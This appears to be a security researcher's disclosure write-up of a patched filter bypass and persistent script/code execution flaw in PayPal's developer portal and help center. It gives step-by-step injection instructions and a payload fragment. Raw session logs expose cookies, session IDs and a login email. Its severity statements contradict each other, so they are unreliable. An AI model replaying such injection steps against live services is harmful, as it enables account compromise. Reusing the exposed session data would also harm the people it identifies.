PayPal Inc fixed Filter Bypass & Profile Code Execution during Infrastructure Upgrades

Editorial_Staff_Team's picture

Filter Bypass & Profile Code Execution fixed during Infrastructure Upgrades (PayPal)

In 2013 the core team member and ceo benjamin kunz mejri discovered a filter bypass and code execution vulnerability that was exploitable through a referer get request by the paypal api. The issue has been reported to paypal inc company in 2013 but the security officials was first unable to reproduce the bug. During some time has passed we continued to explain the officials with various methods and examples the impact of the issue. In 2014 we received a message back that the issue has been patched by multiple internal infrastructure upgrades.

A system specific arbitrary code execution vulnerability was discovered in the official in the official PayPal Inc Web-Application & API. A filter bypass and persistent bug has also been revealed during the tests in the same vulnerable parameter location. The system specific arbitrary code execution vulnerability was located in the developer api portal with connection and account access to the paypal portal api.

First the attacker registers an user account and includes to the `cardholder confidential` and `accountSelName` value own malicious persistent script codes or local web-server files. To attack, the help center data of the malicious profile requires a second registration to the developer api portal with same credentials (connected). The accountSelName and the confidential values are not limited on input. The attacker is able to load script codes but can also remotly execute arbitrary codes to access local web-server files or configs. The filter bypass occurs during the execution onclick by opening the profile. The trusted context of the dev api user account will be streamed through the help center link on GET method requests. The regular filter of paypal prevents the external inject of frames to other websites but in case of this issue the trusted context is directly executed on top of the profile. The execution and inject can occur remotly by attackers and the attack typus is pending from persistent xss to arbitrary code execution and local web-server file request through the profile. The web-server and misconfiguration allows the attacker to for example include a frame with a local request through the trusted context to capture unauthorized data of the system. A webshell inject could also be possible during the execution point of the paypal users profile.

The attack vector is located on the application-side of the paypal service and the injection request method is POST (dev api & help center). The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 9.1. Exploitation of the system specific code execution vulnerability requires a low privileged paypal inc account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific codes, webshell injects via POST method, unauthorized path/file value requests to compromise the application or the connected module components.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] helpcenter/home/ ( https://www.paypal.com/webapps/helpcenter/home/ )
[+] developer.paypal.com ( https://developer.paypal.com/webapps/developer/support )

Vulnerable Parameter(s):
[+] accountSelName confidential
[+] confidential

Affected Module(s):
[+] PayPal Inc – Profile User Index (Main) – Execution through >
https://developer.paypal.com/webapps/developer/support )

Proof of Concept

The system specific code execution and persistent issue (filter bypass) can be exploited by remote attackers with low privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. First register and account to the developer portal api
2. Second connect the paypal account to the help center by registration (2. to 1. also possible)
Note: On registration it`s required to include own payloads (code execution [path|file|config] or script code[html|php|js]) to the AccountSelName & cardholder confidential input.
3. Save the payload to your profile
4. Open the dev webportal & include the same data (payload) to your dev api profile values.
Note: On our tests we did but we are not if this is a requirement for a successful test.
5. Now surf to the following internal dev website https://developer.paypal.com/webapps/developer/support )
Note: On bottom of the page is now the paypal support link with the malicious injected code
6. Click the "Visit PayPal Support" link
7. The website redirect to the local paypal profile with the new api template theme. The system specific code execution occurs directly in the middle were the streamed data of the helpcenter through dev api portal will become visible. The vulnerable executable values are `AccountSelName` and cardholder `confidential` account data.
Note: If you injected script code the script code execution on the main profile request throught the dev api service or a local config/file of the web-server will be loaded.
8. Successful reproduce of the remote vulnerability in the paypal infrastructure!
Note: DETAILS $ PAYPAL TO AUTHORIZED USAGE

Reference(s):
From < https://developer.paypal.com/webapps/developer/support
Through API > https://www.paypal.com/webapps/helpcenter/home/
To < https://www.paypal.com/webapps/helpcenter/home/a [ARBITRARY CODE EXEUCTION!]

PoC: Help Center Index - confidential & accountSelName confidential

<div class="nav product merchant">
<div class="wrapper">
<div class="column_8_16" style="clear:both">
<div class="one column">

<div class="accountSelName confidential">
<div class="confidential" tabindex="0">%20>>"<<x>%20%20%20%20"><i... #./-[SYSTEM
SPECIFIC CODE EXECUTION OR PERSISTENT SCRIPT CODE!]

</div>
</div>

Note: Code snippet poc shows the execution of the code after the inject of the test payloads

--- PoC-Session Logs [GET] (Vulnerable Service) ---
Status: 200[OK]
GET
https://developer.paypal.com/webapps/developer/support Load
Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[2841]
Mime Type[text/html]
Request Headers:
Host[
developer.paypal.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[
https://developer.paypal.com/webapps/developer/dashboard/test]
Cookie[cookie_check=yes; analytics=npXj01hCUWhDymxVPXy6hvRAO8mp6Vab7grsAxepOdYMdbZuOAokBTznGTV664Cfp6JTxQWQSk;
s_sess=%20c_m%3DNatural
%2520Searchpaypal%2520bug%2520bountywww.google.de%3B%20s_cc%3Dtrue%3B%20s_ppv
%3D0%3B%20tr_p1%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl%252Fdust
%252Fdashboard%252Ftest.dust%3B%20v31%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl
%252Fdust%252Fdashboard%252Ftest.dust%3B%20lt%3DSupport%255Edeveloperspartaweb
%252Fweb-inf%252Ftmpl%252Fdust%252Fdashboard%252Ftest.dust%3B%20s_sq
%3Dpaypalglobal%253D%252526pid%25253Ddeveloperspartaweb%2525252Fweb-inf
%2525252Ftmpl%2525252Fdust%2525252Fdashboard%2525252Ftest.dust%252526pidt
%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fdeveloper.paypal.com
%2525252Fwebapps%2525252Fdeveloper%2525252Fsupport%252526ot%25253DA%3B; s_pers=
%20gpv_p23%3Dmain%253Amktg%253Afinancing%253A%253Aunauthhome
%7C1367009015468%3B%20s_fid%3D1C1953F2CF9A8631-0C78EF476327828D
%7C1430080136714%3B%20gpv_c43%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl
%252Fdust%252Fdashboard%252Ftest.dust%7C1367009936721%3B%20gpv_events%3Dno
%2520value%7C1367009936725%3B; ts=vreXpYrS%3D1461678158%26vteXpYrS
%3D1367009181%26vr%3D47e0e1a413e0abe0d4d0d4d0ff0230cd%26vt
%3D47e0e1a413e0abe0d4d0d4d0ff0230cc;
cwrClyrK4LoCV1fydGbAxiNL6iG=m_WedegyrDKHFdAAufD7kF5ZU6s7aO3eJRms9TW1Aqb
MaEGDtkxeY34Bm2p_Hdeq87Nxhr5c1NNBdvfBaH9eMflpanT_YGvgX2nIWI1r5A6hgqXnwf1V
sas9ZF4%7cZzbBc9qDQDohlW04oVtWtiOWLr9U0WKE6S2A0PnGDPPGjZse1c2PabDnan_fh5z
WNuEDFW%7cW-RHDrQRl1Z61RvfQtyKpy9zn2aU_q7vM0hMlqljwNAfggMISaWNpeW46G8lM5Cj0urp0%
7c1367007376; KHcl0EuY7AKSMgfvHl7J5E7hPtK=SaayQldii2iWrbaXFREEUkHzBgkDKOXS4yTeJTgI6fzQphzAG805W5l2oPSNYVPXDKaZsIUSCGQp_3;
consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE
%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE
%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID
%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP
%3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1%26USER_GROUP
%3d4294967295%26FORGOT_BUTTON_ROLE%3d56;
Apache=10.74.8.156.1367005659167493;
__utma=263370009.199482976.1367005657.1367005657.1367005657.1;
__utmb=263370009.14.10.1367005657; __utmc=263370009;
__utmz=263370009.1367005657.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
agzvbiaTG7XC5VaEwLQYUwrb15G=r_szrtUuBwYD4NqoIw8h2WUjW3vVbgmkVo4nfph5BOD
dMpHqO7lRZspuKjGAkR9z7t5bcKMLzkdtsatoh2iXm7MHYjLBOvx1rt8VVCMfVPPtg6_InRirel
fXNFERKV_Igy_kOgIqyiR4oRcZLDSiIvaS8gle7qLylyTdX5v4aOgK_sAq9E24anwk7d_myT6CX
UbQb-R7NqyzMw8VUepjHqSlwNyPKJghSDFGaCHdD3QjksqJQv0q9htdG0JWAQv2oHLs7G;g2bQrGu--
VIan06DHlaPDvMaBlO=E1iMJrsOOEL1cS_wHh1vvEmVHLFgVwqSZqUhJUuCJE4oazlBhxlB_
LpJ58GLANkKI5mfJmWwTdSARHKKlkoLbta2DzCBbSfQrwMrghrYzYq_
EuJAqV7lFBbj_KP8osHKEfkaCVs34_XfppcGWgfledkmJwyk
M7mKxcPYdUTJlvDcNy2sbQiMWhHTh2dhEe_
6re9gZQFjXSy6i979Lbe2UWIPZZnBCXVoMsHD0xbkgEnJqh4Bi11zJc4tS1FChXzd
niWkLTx17WhTjbpyVNE7O-wtjO9-5StitWI3azzMJTlAkA3eBtfw0yhaB70fFCpba_
yENriXQtKsJGcXAm71RAiJwiJEWBkq6iZpqkleEK69-
Q6YP1NY0Dp0B1531BjYZBrZbOAUh8m0X3_Z1-
_RddBXIrU4vnShqZgZworf2okBA7IvMfzWfyv0OfB3aLkd8xtrLCFDgdNBVERHwWHYb7_Mf
EUNJ-6JqM4koqIvLZvDDo9_DCdpfKdwTRu9vQtiB3GaRx7DgVqkOMEtxSJljmPz1HDDtC15cW;
HaC80bwXscjqZ7KM6VOxULOB534=JfvaMWVy2cPSO5bSwbHiwUc2SJBueQbZ9CDRM3vWz
xlwWnFYuoFw1sPOG8KCzk6wz61BNsMVTXCMIQZe2XogMzyRdMIjfgwT6uFt_
hD9krQVnGZvKKxHBuZd
hDMHGcgesSeWG; login_email=x01445%40gmail.com; LANG=en_US%3bDE; Gws4LBnVhSMuyYhD0wXzh01SEK=
jy0DcLqW37pTQNCEhLbqhA3QX00BcwiDqqaD7U13i0aMo
BtISTVSGbl4WlJ-_eEVAsOLl501In5N_1HJBq88q1hBV5S;
SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoW
iJtY1GnpzN4Y-sixGy7BQ; navcmd=xpt%2fCustomer_Profile%2faccount%2fprofile
%2fSellerPreference;
pNTcMTtQfrJuaJiwEnWXQ6yNxfq=GXKuXCGNvT1bsc_jz_Rx9E7VwmZZ8o3dbnxOVVVp9A
axiyWkodDxxKi4R67QRG1M5Y9fj-Wu7wfuRhtJ7-4rEJoEX8JKpG40P-
26PMeKw49jPMtad4WGiZRQSoayGXMsc582PVSkcKSwR6h6qIuMqseWjoOmQyUcBhGpGD
MpZCtdFnUeh7VG8LcUYDbLPeIrziGR7A8uFYcl2UoCzOmLGW9tjXHo849pblqKbUdA9GfnC6mXONIJL7SrRz7cZV2DeIRAUlytDT3bwKroKutZtMwkh9QxWAqJPu
Y2l18_FhlA9bLZKcbu7Hwv7-CKt4s9rk2RAfVkMUxcdUC6BxHn-5nAixQTO8fJ1Sxvm;
navlns=0.0; INSIDE_SEARCH_PARAMS=2%3bDE%3ben_US%3bEurope%2fBerlin;
SPARTAJSESSIONID=b469ade995520]
Connection[keep-alive]

Response Headers:
Date[Fri, 26 Apr 2013 20:29:00 GMT]
Server[Apache-Coyote/1.1]
X-Frame-Options[SAMEORIGIN]

Cache-Control[must-revalidate, proxy-revalidate, no-cache]
Content-Type[text/html;charset=utf-8]
Content-Language[en-US] Set-Cookie[SPARTAJSESSIONID=
b469ade995520;
Domain=.paypal.com; Path=/; Secure; HttpOnly
HaC80bwXscjqZ7KM6VOxULOB534=NeCv0LpChVSb1LUO7ACci9QljSszvP1vnFucjnzDEhQA
aIJwnTGse_O1jK-v1Ix3xMf37CJzCo7mhHFiUqc_jGQ3TZCkyKw7bqsFSXjVmp1At-
QfPpYWWvNBLJ-jwrRCxbkqbW; Domain=.paypal.com; Path=/; Secure; HttpOnly
analytics=WlpqNFIvc5KQfH.5mTE.EHaym1WQXGmbYji.0XQm-
CqpTh.7j5T5WuK2VeQdeoFYVDMJ0N41Q6M; Max-Age=631138519; Expires=Tue, 26-Apr-
2033 16:44:19 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly
SPARTAJSESSIONIDV2=vsEpz8V5yOevktiKlA9Pf7Y6Dqji8U9YEYTL.
2fIuBwSPPV1H3jNv3FOduHGSyqmykhcIaPtx0;
Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=.paypal.com; Path=/; Secure;
HttpOnly]

Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[2841]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]

Note: The session log above with the GET method request shows the request which leads to the execution in the next session-log. The server accepts the malicious and manipulated request and redirects via referer and non expired session to the paypal.com portals were the execution occurs.

--- PoC Session Logs [GET] (Execution) ---
Status: 200[OK]
GET
https://www.paypal.com/webapps/helpcenter/home/./-[CODE EXECUTION VULNERABILITY!] Load
Flags[LOAD_DOCUMENT_URI ] Content Size[5225] Mime Type[text/html]
Request Headers:
Host[
www.paypal.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]Accept-Encoding[gzip, deflate] DNT[1]
Referer[
https://www.paypal.com/webapps/helpcenter/home/]
Cookie[Apache=10.73.8.62.1367005517929267; cookie_check=yes;
analytics=YOCH0Lef0Klib5IKj7VGth-
ESn2IJ5J4WqpvQFrb.if8hr8yIVWtwi260cfUTcb8QcddZn.uTdE; s_sess=%20c_m%3DNatural
%2520Searchpaypal%2520bug%2520bountywww.google.de%3B%20s_cc%3Dtrue%3B
%20tr_p1%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl%252Fdust%252Fsupport
%252Foverview.dust%3B%20lt%3D%3B%20s_ppv%3D93%3B%20v31%3Ddeveloperspartaweb
%252Fweb-inf%252Ftmpl%252Fdust%252Fsupport%252Foverview.dust%3B%20s_sq%3D%3B;
s_pers=%20gpv_p23%3Dmain%253Amktg%253Afinancing%253A%253Aunauthhome
%7C1367009015468%3B%20s_fid%3D1C1953F2CF9A8631-0C78EF476327828D
%7C1430080143210%3B%20gpv_c43%3Ddeveloperspartaweb%252Fweb-inf%252Ftmpl
%252Fdust%252Fsupport%252Foverview.dust%7C1367009943217%3B%20gpv_events%3Dno
%2520value%7C1367009943221%3B; bn_u=1332619451692973419; ts=vreXpYrS
%3D1461678158%26vteXpYrS%3D1367009181%26vr%3D47e0e1a413e0abe0d4d0d4d0ff0230cd
%26vt%3D47e0e1a413e0abe0d4d0d4d0ff0230cc;
cwrClyrK4LoCV1fydGbAxiNL6iG=m_WedegyrDKHFdAAufD7kF5ZU6s7aO3eJRms9TW1Aqb
MaEGDtkxeY34Bm2p_Hdeq87Nxhr5c1NNBdvfBaH9eMflpanT_YGvgX2nIWI1r5A6hgqXnwf1V
sas9ZF4%7cZzbBc9qDQDohlW04oVtWtiOWLr9U0WKE6S2A0PnGDPPGjZse1c2PabDnan_fh5z
WNuEDFW%7cW-RHDrQRl1Z61RvfQtyKpy9zn2aU_q7vM0hMlqljwNAfggMISaWNpeW46G8lM5Cj0urp0%
7c1367007376; KHcl0EuY7AKSMgfvHl7J5E7hPtK=SaayQldii2iWrbaXFREEUkHzBgkDKOXS4yTeJTgI6fzQphzAG805W5l2oPSNYVPXDKaZsIUSCGQp_3;
consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE
%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE
%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID
%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP
%3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1%26USER_GROUP
%3d4294967295%26FORGOT_BUTTON_ROLE%3d56;
agzvbiaTG7XC5VaEwLQYUwrb15G=r_szrtUuBwYD4NqoIw8h2WUjW3vVbgmkVo4nfph5BOD
dMpHqO7lRZspuKjGAkR9z7t5bcKMLzkdtsatoh2iXm7MHYjLBOvx1rt8VVCMfVPPtg6_InRirel
fXNFERKV_Igy_kOgIqyiR4oRcZLDSiIvaS8gle7qLylyTdX5v4aOgK_sAq9E24anwk7d_myT6CX
UbQb-R7NqyzMw8VUepjHqSlwNyPKJghSDFGaCHdD3QjksqJQv0q9htdG0JWAQv2oHLs7G;g2bQrGu--
VIan06DHlaPDvMaBlO=E1iMJrsOOEL1cS_wHh1vvEmVHLFgVwqSZqUhJUuCJE4oazlBhxlB_
LpJ58GLANkKI5mfJmWwTdSARHKKlkoLbta2DzCBbSfQrwMrghrYzYq_
EuJAqV7lFBbj_KP8osHKEfkaCVs34_XfppcGWgfledkmJwyk
M7mKxcPYdUTJlvDcNy2sbQiMWhHTh2dhEe_
6re9gZQFjXSy6i979Lbe2UWIPZZnBCXVoMsHD0xbkgEnJqh4Bi11zJc4tS1FChXzd
niWkLTx17WhTjbpyVNE7O-wtjO9-5StitWI3azzMJTlAkA3eBtfw0yhaB70fFCpba_
yENriXQtKsJGcXAm71RAiJwiJEWBkq6iZpqkleEK69-
Q6YP1NY0Dp0B1531BjYZBrZbOAUh8m0X3_Z1-
_RddBXIrU4vnShqZgZworf2okBA7IvMfzWfyv0OfB3aLkd8xtrLCFDgdNBVERHwWHYb7_Mf
EUNJ-6JqM4koqIvLZvDDo9_DCdpfKdwTRu9vQtiB3GaRx7DgVqkOMEtxSJljmPz1HDDtC15cW;
HaC80bwXscjqZ7KM6VOxULOB534=HP6WwQ0eXaRr2anoOsYKF7CGBw6-
5KhwiYVS1vwLn1Dh9NqoyWEOUWyUHVFtxavpSES_UYk7occE4X3uNtyj7nWnajz1VULGuV06AmM3jy13bLcpDK959inyPjrla7w1z-
Ehm; login_email=x01445%40gmail.com;
LANG=en_US%3bDE; Gws4LBnVhSMuyYhD0wXzh01SEK=
jy0DcLqW37pTQNCEhLbqhA3QX00BcwiDqqaD7U13i0aMo
BtISTVSGbl4WlJ-_eEVAsOLl501In5N_1HJBq88q1hBV5S;
SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoW
iJtY1GnpzN4Y-sixGy7BQ; X-PP-SILOVER=name%3DLIVE6.WEB.1%26silo_version
%3D880%26app%3Dslingshot%26TIME%3D2430368337; navcmd=xpt%2fCustomer_Profile
%2faccount%2fprofile%2fSellerPreference;
pNTcMTtQfrJuaJiwEnWXQ6yNxfq=GXKuXCGNvT1bsc_jz_Rx9E7VwmZZ8o3dbnxOVVVp9A
axiyWkodDxxKi4R67QRG1M5Y9fj-Wu7wfuRhtJ7-4rEJoEX8JKpG40P-
26PMeKw49jPMtad4WGiZRQSoayGXMsc582PVSkcKSwR6h6qIuMqseWjoOmQyUcBhGpGD
MpZCtdFnUeh7VG8LcUYDbLPeIrziGR7A8uFYcl2UoCzOmLGW9tjXHo849pblqKbUdA9GfnC6mXONIJL7SrRz7cZV2DeIRAUlytDT3bwKroKutZtMwkh9QxWAqJPu
Y2l18_FhlA9bLZKcbu7Hwv7-CKt4s9rk2RAfVkMUxcdUC6BxHn-5nAixQTO8fJ1Sxvm;
navlns=0.0; INSIDE_SEARCH_PARAMS=2%3bDE%3ben_US%3bEurope%2fBerlin;
tcs=main:identity:::newsso|_eventId_submit; SPARTAJSESSIONID=4381770a8d243;
SPARTAJSESSIONIDV2=mFJuF3Td8YChLS8hsTBEDYCDlaan6SxOcEV8wCFmUQ37xGuQDc
I25.tBKhyY-IJNPQ0A8Vw-GVXFZfQAHzqpFA;
aksession=1367008449~id=cookievC+wdkyRC0UzSZWXkhBPD6dcl2wC6MkrXhAyCF24bXEAq
a0oGE8xfvt3ph8bjykqTbPzZj330+q7qNHyIj42OcCxIikuXUl0QW1dPeeycH75828YbSSh5/VWmI
MknMhGOK1SQUIF9uQ=] Connection[keep-alive]

Response Headers:
Server[Apache-Coyote/1.1]
X-Frame-Options[SAMEORIGIN]

Cache-Control[must-revalidate, proxy-revalidate, no-cache]
Content-Type[text/html;charset=UTF-8]
Content-Language[en-US]
Content-Encoding[gzip]
Content-Length[5225]
Date[Fri, 26 Apr 2013 20:29:12 GMT]
Connection[keep-alive]
Vary[Accept-Encoding]
Set-Cookie[SPARTAJSESSIONID=
4381770a8d243; Domain=.paypal.com; Path=/; Secure;
HttpOnlySPARTAJSESSIONID=4381770a8d243; Domain=.paypal.com; Path=/; Secure; HttpOnly
HaC80bwXscjqZ7KM6VOxULOB534=67pQ_SbY9KcYXIZwvXf41F1UDHSPOlpuWZWBr5Syc
RDYDMkpDjL9wnHZibXjZxPWxipETeT9OLSEDymNqzEsfdBbL_pDE1cnTJ2yiEUV1isdJqbcfq_
FgpHVutAELsNqqk7uG; Domain=.paypal.com; Path=/; Secure; HttpOnly
analytics=0-AAbZ6STFaFViK65yobUytJf35vDfg1mxCQbONr6nxMY3v8tY97GBmh.
rm.LWF9zJC4dJEEJs; Max-Age=631138519; Expires=Tue, 26-Apr-2033
16:44:31 GMT;
Domain=.paypal.com; Path=/; Secure; HttpOnly
SPARTAJSESSIONIDV2=wVm2OLjyw5F9VbwqocGR0TgDSghsfPAZXvCq1e1Aaap7fuaNiRX
WFyBQE14Y1Em66vpfwGMDIo5ncV1LCDFYow; Domain=.paypal.com; Path=/; Secure;
HttpOnly]

Note: The session logs above shows that the server accepted (200OK) the request and answers with the malicious code execution (GET) as response to me as user. The service runs under the same origin policy which returns in the result of the dev through the help center. The execution can also be watched in the recorded research video for the paypal bug bounty issue #88.

Solution - Fix & Patch
A solution to fix the issue could be to parse all incoming values through the same origin policy configuration of the connected portal with the same api. The vulnerable accountselname confidential and confidential values needs to be encoded even if transfered through andother service location. Restrict the input for registration and disallow specialchars to prevent script code injects and code execution payloads with unauthorized file requests through the trusted paypal home webapps context.
Note: After the report the issue has been patched by paypal inc during a regular infrastructure upgrade to 2014Q4.

During the tests the researcher revealed a video to paypal official that demonstrates how the code execution occurs through the referer value in a regular GET request.

PayPal Inc (Ebay Inc Bug Bounty Program) - Filter Bypass & Code Execution Vulnerability (Video Demonstration)

Advisory: http://www.vulnerability-lab.com/get_content.php?id=936

Video: http://www.vulnerability-lab.com/get_content.php?id=1275

Rate this article: 
Average: 5 (16 votes)

Comments

Sujon's picture

Wonderful bug bounty information u have provide. congrats to you.

Add new comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.